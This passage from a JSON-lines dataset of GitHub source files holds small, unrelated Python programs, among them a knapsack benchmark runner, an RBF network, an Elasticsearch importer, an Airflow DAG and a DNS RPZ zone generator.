\"1280x1024\"","repo_name":"sotiskot/SlideGame","sub_path":"V4/screen.py","file_name":"screen.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41227169091","text":"import time\nimport schedule\nfrom threading import Thread\nimport time\nimport signal\nimport os\nfrom utils import get_data, create_folder\nfrom tqdm import tqdm\nfrom or_algorithm_knapsack import processing_data_or, solver_snapback\nfrom genetic_knapsack import processing_data_genetic_algorithm, run\nimport argparse\n\n\n# You can change time stop in here\nTIME_STOP = 300\nBLACK_LIST_TEST_CASE = ['02000', '05000', '10000']\n\ndef run_OR(TIME_STOP, data):\n print(f'Processing OR Algorithms in {TIME_STOP} seconds')\n for folder_key in data:\n f = open(f'TestResults/{TIME_STOP}_s/OR_{TIME_STOP}s/{folder_key}.txt', 'w')\n f.write('Folder: {}\\n\\n'.format(folder_key))\n print('Folder: {}'.format(folder_key))\n for tmp_data in tqdm(data[folder_key]):\n if tmp_data[1:] in BLACK_LIST_TEST_CASE:\n break\n\n f.write('Numbers of test case: {}\\n'.format(tmp_data[1:]))\n \n counting_test_case = 1\n for idx in data[folder_key][tmp_data]:\n f.write(f'{counting_test_case} times:\\n')\n \n values, weights, capacities = processing_data_or(idx)\n total_weight, computed_value, packed_weights = solver_snapback(values, weights, capacities)\n \n f.write('Total weight: {}\\n'.format(total_weight))\n f.write('Total value: {}\\n'.format(computed_value))\n f.write('Packed_weights: {}\\n\\n'.format(packed_weights))\n\n counting_test_case = counting_test_case + 1\n\n f.close()\n\ndef run_Genetic(TIME_STOP, data):\n print(f'Processing Genetic Algorithms in {TIME_STOP} seconds')\n for folder_key in data:\n f = open(f'TestResults/{TIME_STOP}_s/Genetic_{TIME_STOP}s/{folder_key}.txt', 'w') \n f.write('Folder: {}\\n\\n'.format(folder_key))\n print('Folder: {}'.format(folder_key))\n for tmp_data in tqdm(data[folder_key]):\n if tmp_data[1:] in BLACK_LIST_TEST_CASE:\n break\n \n f.write('Numbers of test case: {}\\n'.format(tmp_data[1:]))\n\n counting_test_case = 1\n for idx in data[folder_key][tmp_data]:\n f.write(f'{counting_test_case} times:\\n')\n\n items , capacities = processing_data_genetic_algorithm(idx)\n bestFitnessValues, totalWeight, totalValue = run(items, capacities)\n\n f.write(f'Best Ever Fitness: {bestFitnessValues}\\n')\n f.write(f'Total Weights: {totalWeight}\\n')\n f.write(f'Total values: {totalValue}\\n\\n')\n\n counting_test_case = counting_test_case + 1\n\n f.close()\n\n\ndef exit_data():\n print('\\nExiting process\\n')\n # sys.exit()\n os.kill(os.getpid(), signal.SIGTERM)\n\ndef exit_data_thread(time_to_exit=TIME_STOP):\n schedule.every(time_to_exit).seconds.do(exit_data)\n while True:\n schedule.run_pending()\n time.sleep(1)\n\nif __name__ == \"__main__\":\n # Create folder test results for or and genetic algorithm\n create_folder('TestResults')\n create_folder(f'TestResults/{TIME_STOP}_s')\n create_folder(f'TestResults/{TIME_STOP}_s/OR_{TIME_STOP}s/')\n create_folder(f'TestResults/{TIME_STOP}_s/Genetic_{TIME_STOP}s/')\n\n # Argparse argument\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-o\", \"--option\", help=\"Choose 1 to run OR Algorithm or 2 to run Genetic Algorithm\", type=int)\n args = parser.parse_args()\n\n # Get data from folder kplib\n print('Get data')\n all_data = get_data('kplib')\n \n\n if args.option == 1:\n # Create a process with TIME_STOP \n Thread(target=exit_data_thread).start()\n run_OR(TIME_STOP=TIME_STOP, data=all_data)\n elif args.option == 2:\n Thread(target=exit_data_thread).start()\n run_Genetic(TIME_STOP=TIME_STOP, data=all_data)\n else:\n raise TypeError(\"Only choose 1 or 2 option to run program. You can type python main.py -h to show helping command.\")","repo_name":"anhquan075/CS106-Knapsack","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4003,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"28698937940","text":"import asyncio\n\nasync def get_html(sleep_times):\n print(\"==========start get url==========\")\n await asyncio.sleep(sleep_times)\n print(\"==========end get url {}s==========\".format(sleep_times))\n\nif __name__ == '__main__':\n '''实现Ctrl+C停止任务'''\n task1=get_html(2)\n task2=get_html(1)\n task3=get_html(3)\n tasks=[task1,task2,task3]\n loop=asyncio.get_event_loop()\n try:\n loop.run_until_complete(asyncio.wait(tasks))\n except KeyboardInterrupt as e: #按Ctrl+C时触发取消任务\n all_tasks=asyncio.Task.all_tasks() #获取所有的task\n for task in all_tasks: #取消所有的任务\n print(\"任务取消:\",task.cancel())\n loop.stop()\n loop.run_forever() #不这么写抛异常\n finally:\n loop.close()","repo_name":"Air-Zhuang/Test35","sub_path":"Thread/coroutine/asyncio_test/asyncio3_cancel.py","file_name":"asyncio3_cancel.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"9719024145","text":"#! /usr/bin/env python3\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom mpi4py import MPI\n\ndef L2Norm (res, ref):\n ref_norm = np.sqrt(np.sum(np.power(ref, 2)))\n error_norm = np.sqrt(np.sum(np.power((ref-res), 2)))\n return error_norm/ref_norm\n\ndef LinfNorm (res, ref):\n ref_norm = np.max(np.abs(ref))\n error_norm = np.max(np.abs(ref-res))\n return error_norm/ref_norm\n \ndef setOverlaps(default_overlap, domain_corners, N_p_d, comm_freq, num_domains, base_overlap, overlap):\n sugested_base_vir_dy = []\n sugested_base_vir_dx = []\n\n for i in range(0, num_domains):\n orig_y = (domain_corners[i][1][0] - domain_corners[i][0][0])\n orig_x = (domain_corners[i][1][1] - domain_corners[i][0][1])\n sugested_base_vir_dy.append(int(np.lcm(orig_y, N_p_d[i][0]) / orig_y))\n sugested_base_vir_dx.append(int(np.lcm(orig_x, N_p_d[i][1]) / orig_x))\n\n base_vir_dy = np.lcm.reduce(sugested_base_vir_dy)\n base_vir_dx = np.lcm.reduce(sugested_base_vir_dx)\n\n vir_dy = []\n vir_dx = []\n for i in range(0, num_domains):\n orig_y = (domain_corners[i][1][0] - domain_corners[i][0][0])\n orig_x = (domain_corners[i][1][1] - domain_corners[i][0][1])\n vir_dy.append(int((orig_y*base_vir_dy) / N_p_d[i][0]))\n vir_dx.append(int((orig_x*base_vir_dx) / N_p_d[i][1]))\n\n max_orig_res_x = 0\n max_orig_res_y = 0\n y_sizes = []\n x_sizes = []\n\n # Recalculating overlps based on constrains and GCD of base and all other resolutions\n overlap_min = default_overlap\n overlap_max = (default_overlap[0]*2,default_overlap[1]*2)\n\n y_lcm = np.lcm.reduce(vir_dy)\n y_overlap_chunk = int(y_lcm / base_vir_dy)\n y_overlap = y_overlap_chunk\n y_chunks = 1\n\n while (y_overlap < overlap_min[0]):\n y_overlap = y_overlap + y_overlap_chunk\n y_chunks = y_chunks + 1\n\n X_lcm = np.lcm.reduce(vir_dx)\n x_overlap_chunk = int(X_lcm / base_vir_dx)\n x_overlap = x_overlap_chunk\n x_chunks = 1\n\n while (x_overlap < overlap_min[1]):\n x_overlap = x_overlap + x_overlap_chunk\n x_chunks = x_chunks + 1\n\n if ((x_overlap > overlap_max[1]) or (y_overlap > overlap_max[0])):\n raise Exception(\"Incompatible resolutions with given overlaps constrains\")\n\n base_overlap.append(int(y_lcm / base_vir_dy)*y_chunks)\n base_overlap.append(int(X_lcm / base_vir_dx)*x_chunks)\n\n overlap_mult = 1\n # for i in range(0, num_domains):\n # # Inflating overlaps for comm red\n # if (comm_freq[i] != 1):\n # print(\"Info: doubling the overlaps to alow communication reduction.\")\n # overlap_mult = 2\n\n \n for i in range(0, num_domains):\n curr_overlap_y = int(y_lcm/vir_dy[i]) * y_chunks\n curr_overlap_x = int(X_lcm/vir_dx[i]) * x_chunks\n\n overlap.append((curr_overlap_y*overlap_mult, curr_overlap_x*overlap_mult))\n\ndef show_load_balance(output, backend=\"matplotlib\"): \n if MPI.COMM_WORLD.Get_rank() == 0:\n ranks = MPI.COMM_WORLD.Get_size()\n # bs = 2**(base_pow+max_pow-1)\n # def_Ny_g = 2*bs\n # def_Nx_g = 2*bs\n # plt.imshow(std_output[0]['p_final'])\n # plt.colorbar()\n # plt.show()\n plt.figure()\n bar_data = []\n max_runtime = 0\n for i in range(len(output)):\n rank_data = output[i][\"json_dict\"][\"RankData\"]\n bar_data.append([])\n bar_data[i].append([])\n for data in rank_data:\n bar_data[i][0].append(data[\"VelocityStepTime\"])\n bar_data[i].append([])\n for data in rank_data:\n bar_data[i][1].append(data[\"VelocityScatTime\"])\n bar_data[i].append([])\n for data in rank_data:\n bar_data[i][2].append(data[\"VelocityGathTime\"])\n bar_data[i].append([])\n for data in rank_data:\n bar_data[i][3].append(data[\"PressureStepTime\"])\n bar_data[i].append([])\n for data in rank_data:\n bar_data[i][4].append(data[\"PressureScatTime\"])\n bar_data[i].append([])\n for data in rank_data:\n bar_data[i][5].append(data[\"PressureGathTime\"])\n \n\n for i in range(len(output)): \n left = np.zeros(ranks)\n for data in bar_data[i]:\n left += data\n if np.max(left) > max_runtime:\n max_runtime = np.max(left)\n \n if backend == \"matplotlib\":\n for i in range(len(output)): \n ax = plt.subplot(len(output), 1, i+1)\n left = np.zeros(ranks)\n width = 0.5\n for data in bar_data[i]:\n p = ax.barh(range(ranks), data, width, left=left)\n left += data\n plt.xlim((0,max_runtime))\n else:\n for i in range(len(output)): \n ax = plt.subplot(len(output), 1, i+1)\n left = np.zeros(ranks)\n unbalance = np.zeros(ranks)\n width = 0.5\n print(\"=======================================\")\n for data in bar_data[i]:\n # print(*(left+data))\n print(*(data))\n min_val = np.min(data)\n print(*(data-min_val))\n print(\"=======================================\")\n left += data\n unbalance += data-min_val\n print()\n print(*(unbalance)) \n print()\n \n\ndef create_domain_corners(orig_corners, decomposition, corners):\n N = (orig_corners[1][0] - orig_corners[0][0], orig_corners[1][1] - orig_corners[0][1])\n\n procs_y = decomposition[0]\n procs_x = decomposition[1]\n \n y_step = int(N[0] / procs_y)\n x_step = int(N[1] / procs_x)\n\n for i in range(procs_y):\n for j in range(procs_x):\n corners.append([(orig_corners[0][0] + i*y_step, orig_corners[0][1] + j*x_step), (orig_corners[0][0] + (i+1)*y_step, orig_corners[0][1] + (j+1)*x_step)])\n return corners\n","repo_name":"Kristian92101/nurts-lfb","sub_path":"lfbutils.py","file_name":"lfbutils.py","file_ext":"py","file_size_in_byte":6207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72143073639","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# (c) code-rgb\n\nfrom pyrogram import Client\nfrom pyrogram import __version__\nfrom pyrogram.raw.all import layer\n\nfrom pyrobot import (\n APP_ID,\n API_HASH,\n TG_BOT_TOKEN,\n TMP_DOWNLOAD_DIRECTORY,\n LOGGER\n)\n\n\nclass app(Client):\n\n def __init__(self):\n name = self.__class__.__name__.lower()\n\n \n super().__init__(\n \":memory:\",\n plugins=dict(root=\"pyrobot/plugins\"),\n workdir=TMP_DOWNLOAD_DIRECTORY,\n api_id=APP_ID,\n api_hash=API_HASH,\n bot_token=TG_BOT_TOKEN\n )\n \n\n async def start(self):\n await super().start()\n\n usr_bot_me = await self.get_me()\n LOGGER.info(\n f\"Reddit-X Bot based on Pyrogram v{__version__} \"\n f\"(Layer {layer}) started on @{usr_bot_me.username}. \"\n \"Hi.\"\n )\n\n async def stop(self, *args):\n await super().stop()\n LOGGER.info(\"Reddit-X Bot stopped. Bye.\")\n","repo_name":"code-rgb/Reddit-x-bot","sub_path":"pyrobot/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1041,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"25575081196","text":"'''\nLink : https://www.acmicpc.net/problem/2739\nDifficulty : BRONZE-3\nCategory : 수학, 구현, 사칙연산\nTitle : 구구단\n'''\n\nimport sys\n\nn = int(sys.stdin.readline().rstrip())\n\nfor i in range(1, 10):\n print('%d * %d = %d' %(n, i, n*i))","repo_name":"devju94/baekjoon-solutions","sub_path":"solutions/b3_2739.py","file_name":"b3_2739.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"38738789798","text":"\"\"\"\nEvents URL configuration.\n\"\"\"\nfrom django.urls import path\nfrom .views import EventListView, EventDetailsView, BulkUploadView, AddParticipantToEventView, EventCreateView, \\\n EventUpdateView\n\nurlpatterns = [\n path('', EventListView.as_view(), name='event_list'),\n path('detail//', EventDetailsView.as_view(), name='event-detail'),\n path('bulk_upload', BulkUploadView.as_view(), name='bulk_upload'),\n path('events//add-participant/', AddParticipantToEventView.as_view(), name='add_participant'),\n path('events/create/', EventCreateView.as_view(), name='event-create'),\n path('events//update/', EventUpdateView.as_view(), name='event-update'),\n\n\n]","repo_name":"iamgigahex/school-event-registration-v1","sub_path":"event_registration/events/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1480899147","text":"import numpy as np\nimport pcn\nimport kmeans\n\nclass rbf:\n \"\"\"The Radial Basis Function Network\"\"\"\n\n def __init__(self, inputs, targets, n_rbf, sigma=0, use_kmeans=0,\n normalise=0):\n self.n_in = np.shape(inputs)[1]\n self.n_out = np.shape(targets)[1]\n self.n_data = np.shape(inputs)[0]\n self.n_rbf = n_rbf\n self.use_kmeans = use_kmeans\n self.normalise = normalise\n\n if use_kmeans:\n self.kmeans_net = kmeans.kmeans(self.n_rbf, inputs)\n\n self.hidden = np.zeros((self.n_data, self.n_rbf + 1))\n\n if sigma == 0:\n # Set the width of Gaussians\n d = (inputs.max(axis=0) - inputs.min(axis=0)).max()\n self.sigma = d / np.sqrt(2 * n_rbf)\n else:\n self.sigma = sigma\n\n self.perceptron = pcn.pcn(self.hidden[:, :-1], targets)\n\n # Initialize the network\n self.weights1 = np.zeros((self.n_in, self.n_rbf))\n\n def rbf_train(self, inputs, targets, eta=0.25, n_iterations=100):\n\n if self.use_kmeans == 0:\n # Version 1: Set RBFs to be datapoints\n indices = range(self.n_data)\n np.random.shuffle(indices)\n for i in range(self.n_rbf):\n self.weights1[: i] = inputs[indices[i], :]\n\n else:\n # Version 2: use k-means\n self.weights1 = np.transpose(self.kmeans_net.kmeanstrain(inputs))\n\n for i in range(self.n_rbf):\n self.hidden[:,i] = np.exp(-np.sum((inputs - np.ones((1,self.n_in))*self.weights1[:,i])**2,axis=1)/(2*self.sigma**2))\n\n if self.normalise:\n self.hidden[:, :-1] /= self.hidden[:, :-1].sum(axis=1).reshape(-1, 1)\n\n # Call Perceptron without bias node\n self.perceptron.pcntrain(self.hidden[:, :-1], targets, eta, n_iterations)\n\n def rbf_fwd(self, inputs):\n\n hidden = np.zeros((np.shape(inputs)[0], self.n_rbf + 1))\n\n for i in range(self.n_rbf):\n hidden[:,i] = np.exp(-np.sum((inputs - np.ones((1,self.n_in))*self.weights1[:,i])**2,axis=1)/(2*self.sigma**2))\n\n if self.normalise:\n hidden[:,:-1] /= hidden[:,:-1].sum(axis=1).reshape(-1, 1)\n\n # Add the bias\n hidden[:,-1] = -1\n\n outputs = self.perceptron.pcnfwd(hidden)\n return outputs\n\n def confmat(self, inputs, targets):\n \"\"\"Confusion Matrix\"\"\"\n\n outputs = self.rbf_fwd(inputs)\n n_classes = np.shape(targets)[1]\n\n if n_classes == 1:\n n_classes = 2\n outputs = np.where(outputs > 0, 1, 0)\n else:\n # 1-of-N encoding\n outputs = np.argmax(outputs, 1)\n targets = np.argmax(targets, 1)\n\n cm = np.zeros((n_classes, n_classes))\n for i in range(n_classes):\n for j in range(n_classes):\n cm[i, j] = np.sum(np.where(outputs==i, 1, 0) * np.where(targets==j, 1, 0))\n\n print(cm)\n print(np.trace(cm) / np.sum(cm))\n","repo_name":"dalmia/Deep-learning-tutorials","sub_path":"Machine learning book/4 - Radial Basis Functions/rbf.py","file_name":"rbf.py","file_ext":"py","file_size_in_byte":2964,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"18"} +{"seq_id":"24775395401","text":"import torch\n\n\nclass ReplayBuffer:\n def __init__(self):\n self.buffer = [] # 缓冲区\n\n def push(self, state, action, reward, next_state, done):\n ''' 缓冲区是一个队列,容量超出时去掉开始存入的转移(transition)\n '''\n self.buffer.append((state, action, reward, next_state, done))\n\n def sample(self):\n l_s, l_a, l_r, l_s_, l_done = [], [], [], [], []\n for item in self.buffer:\n s, a, r, s_, done = item\n l_s.append(torch.tensor([s], dtype=torch.float))\n l_a.append(torch.tensor([a], dtype=torch.float))\n l_r.append(torch.tensor([r], dtype=torch.float))\n l_s_.append(torch.tensor([s_], dtype=torch.float))\n l_done.append(torch.tensor([done], dtype=torch.float))\n s = torch.cat(l_s, dim=0)\n r = torch.cat(l_r, dim=0)\n done = torch.cat(l_done, dim=0)\n a = torch.cat(l_a, dim=0)\n # r = torch.cat(l_r, dim=0)\n s_ = torch.cat(l_s_, dim=0)\n self.data = []\n return s, a, r, s_, done\n\n def clear(self):\n self.buffer = []\n self.position = 0\n\n def __len__(self):\n ''' 返回当前存储的量\n '''\n return len(self.buffer)\n","repo_name":"calmzzc/ChengDu_PPO_New","sub_path":"memory.py","file_name":"memory.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11864350255","text":"import datetime\nfrom os import getcwd\nimport utils\n\ndef parse_user_info(user_data: dict) -> dict:\n json_path = getcwd() + \"/temp/profile_information/profile_information.json\"\n info = utils.json_file_converter(json_path)\n profile_data = info[\"profile\"]\n user_name = profile_data[\"name\"][\"full_name\"].encode('latin_1').decode('utf8')\n join_year = utils.epoch_to_year(profile_data[\"registration_timestamp\"])\n if \"relationship\" in profile_data:\n relationship_status = profile_data[\"relationship\"][\"status\"].encode('latin_1').decode('utf8')\n if \"partner\" in profile_data[\"relationship\"]:\n relationship_status += \" with \" + profile_data[\"relationship\"][\"partner\"]\n relationship_timestamp = utils.epoch_to_year(profile_data[\"relationship\"][\"timestamp\"])\n else:\n relationship_status = \"No data\"\n relationship_timestamp = \"No data\"\n\n # instantiate a list of years [1996, 1997, 1998, ... , 2021]\n current_year = datetime.date.today().year\n year_list = list(range(int(join_year), current_year + 1))\n # instantiate a list of months [January 1996, February 1996, March 1996, ... , December 2021]\n month_list = utils.year_init()\n full_month_list = []\n for year in year_list:\n for month in month_list.keys():\n full_month_list.append(month + \" \" + str(year))\n\n # remove months in the future\n current_month = datetime.date.today().strftime('%m')\n current_month_name = utils.number_to_month_name(current_month)\n current_month_index = full_month_list.index(current_month_name + \" \" + str(current_year))\n full_month_list = full_month_list[:current_month_index]\n\n ex_1 = \"None\"\n ex_2 = \"None\"\n ex_3 = \"None\"\n \n if \"previous_relationships\" in profile_data:\n if len(profile_data[\"previous_relationships\"]) > 0:\n ex_1 = profile_data[\"previous_relationships\"][0][\"name\"]\n if len(profile_data[\"previous_relationships\"]) > 1:\n ex_2 = profile_data[\"previous_relationships\"][1][\"name\"]\n if len(profile_data[\"previous_relationships\"]) > 2:\n ex_3 = profile_data[\"previous_relationships\"][2][\"name\"]\n\n # find number of family member connections on Facebook\n if \"family_members\" in profile_data:\n nbr_of_family_members = len(profile_data[\"family_members\"])\n else:\n nbr_of_family_members = 0\n\n # fill in the info\n user_data[\"user_name\"] = user_name\n user_data[\"join_year\"] = join_year\n user_data[\"year_list\"] = year_list\n user_data[\"month_list\"] = full_month_list\n user_data[\"relationship_status\"] = relationship_status\n user_data[\"relationship_timestamp\"] = relationship_timestamp\n user_data[\"ex#1\"] = ex_1\n user_data[\"ex#2\"] = ex_2\n user_data[\"ex#3\"] = ex_3\n user_data[\"nbr_of_family_members\"] = nbr_of_family_members\n return user_data","repo_name":"Allexio/fb-user-data-analyser","sub_path":"src/parser_profile_info.py","file_name":"parser_profile_info.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"4504009917","text":"#If a string has 'x' repeated 5 times, replace this \"xxxxx\" with \"x5\".\r\n\r\n#The string is compressed only when the repeated character count is more than 1.\r\nfrom sys import stdin\r\n\r\ndef getCompressedString(s) :\r\n\t# Write your code here.\r\n\tn = len(s)\r\n\r\n\t# Declare empty string.\r\n\tanswer = \"\"\r\n\t\r\n\t# Initialize current count of any character in string.\r\n\tcurrentCharCount = 1\r\n\r\n\t# Add first letter of string to answer.\r\n\tanswer += s[0]\r\n\t\r\n\tfor i in range(1, n):\r\n\r\n\t\t# If the current letter is same as previous.\r\n\t\tif s[i] == s[i - 1]:\r\n\t\t\tcurrentCharCount += 1\r\n\t\t\t\r\n\t\telse:\r\n\t\t\tif currentCharCount > 1:\r\n\r\n\t\t\t\t# Add count of letter in answer.\r\n\t\t\t\tanswer += str(currentCharCount)\r\n\t\t\t\tcurrentCharCount = 1\r\n\t\t\t\t\r\n\t\t\tanswer += s[i]\r\n\r\n\tif currentCharCount > 1:\r\n\t\tanswer += str(currentCharCount)\r\n\r\n\t# Return answer.\r\n\treturn answer\r\n\r\n# Main.\r\nstring = stdin.readline().strip();\r\nans = getCompressedString(string)\r\nprint(ans)","repo_name":"SumitB007/Python_Course","sub_path":"Strings/compressthestring.py","file_name":"compressthestring.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6014840273","text":"import numpy as np\nfrom matplotlib.colors import LinearSegmentedColormap\nfrom constants import rsun\n\ndef rotation_law(h):\n mass = h.star_mass[0]\n vsurf = 1.5e7\n if mass < 1.2:\n vsurf *= (mass/1.2)**2\n omega = vsurf / (rsun*10**h.log_R)\n return omega\n\ndef tri_area(xs,ys):\n arr = np.ones((3,3))\n arr[0] = xs\n arr[1] = ys\n area = 0.5 * np.linalg.det(arr)\n return area\n\ndef tri_max_length(xs,ys):\n side_lengths = list(((xs[i]-xs[i-1])**2+(ys[i]-ys[i-1])**2)**0.5 for i in range(3))\n return max(side_lengths)\n\ndef find_zams(logl,loglh,model):\n zams=1\n while (loglh[zams] < 1.0*logl[zams]): \n zams=zams+1\n return zams; \n\ndef find_h(dh,center_h1,model):\n zams=1\n while (center_h1[zams] > (center_h1[1] - dh)): \n zams=zams+1\n return zams; \n\ndef find_mams(center_h1,model):\n mams=1\n while (center_h1[mams] > 0.5 * center_h1[1]): \n mams=mams+1\n return mams; \n\ndef find_tams(center_h1,model):\n tams=1\n while (center_h1[tams] > 0.05): \n tams=tams+1\n return tams; \n\ndef find_max(a,b,c,d):\n z= [0] * len(a)\n for i in range(0, len(a)):\n z[i]=max(a[i],b[i],c[i],d[i]) \n return z;\n\ndef find_mid_ms(model,star_age,zams,tams):\n mid_ms=1\n age_ms=(star_age[tams]-star_age[zams])/2\n while (star_age[mid_ms] < age_ms): \n mid_ms=mid_ms+1\n return mid_ms; \n\ndef find_frac_ms(model,star_age,zams,tams,frac):\n frac_ms=1\n age_frac_ms=(star_age[tams]-star_age[zams])*frac\n while ((star_age[frac_ms] - star_age[zams]) < age_frac_ms): \n frac_ms=frac_ms+1\n return frac_ms; \n\ndef concat(a,b):\n return a+'_'+b\n\ndef CustomCmap(from_rgb,to_rgb):\n\n # from color r,g,b\n r1,g1,b1 = from_rgb\n\n # to color r,g,b\n r2,g2,b2 = to_rgb\n\n cdict = {'red': ((0, r1, r1),\n (1, r2, r2)),\n 'green': ((0, g1, g1),\n (1, g2, g2)),\n 'blue': ((0, b1, b1),\n (1, b2, b2))}\n\n cmap = LinearSegmentedColormap('custom_cmap', cdict)\n return cmap","repo_name":"matteocantiello/gwade","sub_path":"code/.ipynb_checkpoints/functions-checkpoint.py","file_name":"functions-checkpoint.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"41877148415","text":"from urllib.parse import urlparse\nimport socket\nimport sys, getopt\n\ndef createZone(inp, out):\n out = open(out, 'w')\n out.write(\"$TTL 60s;\\n$ORIGIN ua.\\n@ SOA dns.ua. ung.utt.fr ( 1 20m 15m 1d 2h)\\n NS dns.ua.\\n\\n\")\n with open(inp) as f:\n lines = f.readlines()\n cpt = 0\n for line in lines:\n p = urlparse(line)\n h = p.hostname\n if h is not None:\n try:\n socket.inet_aton(h)\n except socket.error:\n cpt += 1\n out.write(\"%s CNAME .\\n\" % h)\n print(\"%d lines in zonefile.\" % cpt)\n out.close()\n\ndef printHelp():\n print('createRpz.py -i -o ')\n\ndef main(argv):\n inputfile = ''\n outputfile = ''\n try:\n opts, args = getopt.getopt(argv,\"hi:o:\",[\"ifile=\",\"ofile=\"])\n except getopt.GetoptError:\n printHelp()\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-h':\n printHelp()\n sys.exit()\n elif opt in (\"-i\", \"--ifile\"):\n inputfile = arg\n elif opt in (\"-o\", \"--ofile\"):\n outputfile = arg\n if inputfile == '' or outputfile == '':\n printHelp()\n else:\n createZone(inputfile, outputfile)\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])","repo_name":"ungdev/ua-lancache","sub_path":"dns/createRpz.py","file_name":"createRpz.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"36987747922","text":"from airflow import DAG\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.operators.bash_operator import BashOperator\nfrom datetime import datetime\n\n\ndag = DAG(\n 'fyp_workflow',\n description='FYP Workflow',\n schedule_interval='@monthly',\n start_date=datetime(2023, 6, 15),\n)\n\n# Define tasks\nstart_task = DummyOperator(task_id='start_task', dag=dag)\n\ntask1 = BashOperator(\n task_id='task1',\n bash_command='echo \"Executing task 1\"',\n dag=dag,\n)\n\ntask2 = BashOperator(\n task_id='task2',\n bash_command='echo \"Executing task 2\"',\n dag=dag,\n)\n\nend_task = DummyOperator(task_id='end_task', dag=dag)\n\nstart_task >> task1\nstart_task >> task2\ntask1 >> end_task\ntask2 >> end_task\n","repo_name":"narmeen-naqvi/MLOps-Project","sub_path":"fyp_workflow.py","file_name":"fyp_workflow.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"9523652141","text":"import csv\nimport os\nimport datetime\nimport json\nimport glob\nimport requests\nimport elasticsearch as elas\nfrom bson import json_util\nimport Mongodb\nfrom elasticsearch.helpers import bulk\nimport time\nimport pandas as pd\n\n## connexion to elasticsearch\ndef connexion():\n print(datetime.datetime.now())\n return elas.Elasticsearch([{'host': 'localhost', 'port': 9200}])\n\ndef create_index(es,index_name):\n print(datetime.datetime.now())\n if not es.indices.exists(index=index_name):\n es.indices.create(index=index_name)\n\ndef delete_index(es,index_name):\n es.indices.delete(index=index_name, ignore=[400, 404])\n\n##conversion csv to json\ndef csv_to_json(csvf,jsonf,fieldnames):\n csvfile = open(csvf, 'r')\n jsonfile = open(jsonf, 'w')\n reader = csv.DictReader(csvfile, fieldnames)\n n=False\n for row in reader:\n if n:\n json.dump(row, jsonfile)\n jsonfile.write('\\n')\n n=True\n\n\n## import all_sites to elasticsearch\ndef all_sites_to_es(es, index_name, docname,directory):\n print(datetime.datetime.now())\n csvfile = open(directory+'all_sites.csv', 'r')\n reader = csv.DictReader(csvfile)\n header = [\"SITE_ID\", \"INDUSTRY\", \"SUB_INDUSTRY\", \"SQ_FT\", \"LAT\", \"LNG\", \"TIME_ZONE\", \"TZ_OFFSET\"]\n\n for each in reader:\n row = {}\n L=[]\n for field in header:\n\n row[field] = each[field]\n\n es.index(index=index_name, doc_type=docname, body=row)\n es.indices.refresh(index=index_name)\n\n\n## import all_datas_sites to elasticsearch\ndef all_datas_sites_to_esv2(es,db,directory,index_name, docname):\n print(datetime.datetime.now())\n dbsite = db.enernoc.all_sites\n list_file = Mongodb.list_all_file(directory, \"csv\")\n actions = []\n for i in range(len(list_file)):\n print(list_file[i])\n data = pd.read_csv(list_file[i]).fillna('') ##lecture du csv\n filename = os.path.split(list_file[i])[1].replace('.csv', \"\")\n site_id = str(filename)\n site_add = Mongodb.site_id_to_id(dbsite, site_id)\n a = [site_add] * len(data)\n data['SITE'] = a\n geopoint=(str(data['SITE'][0]['LAT'])+\", \"+str(data['SITE'][0]['LNG'])) ## concatenation lat + lng pour mapping Kibana\n data['geo_point']=geopoint\n data['date'] = pd.to_datetime(data['timestamp'], unit='s')\n\n data_records = data.to_dict(orient='records') ##conversion pour format elasticsearch (dict)\n\n if not es.indices.exists(index_name):\n es.indices.create(index_name)\n\n print(\"Début import Elastic\")\n for i, r in enumerate(data_records):\n actions.append({\"_index\": index_name,\n \"_type\": docname,\n \"_source\": r})\n\n\n bulk(es, actions=actions, index=index_name, doc_type=docname, refresh=False) ## import dans elasticsearch via bulk\n es.indices.refresh(index=index_name)\n\n # helpers.parallel_bulk(client=es, actions=actions, thread_count=4, refresh=False)\n # es.indices.refresh(index=index_name)\n\n\n","repo_name":"wioui/bigdataproject","sub_path":"elastic.py","file_name":"elastic.py","file_ext":"py","file_size_in_byte":3039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"24887253673","text":"from PyQt5.QtWidgets import QFileDialog\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom splitter_logic import *\n\nclass 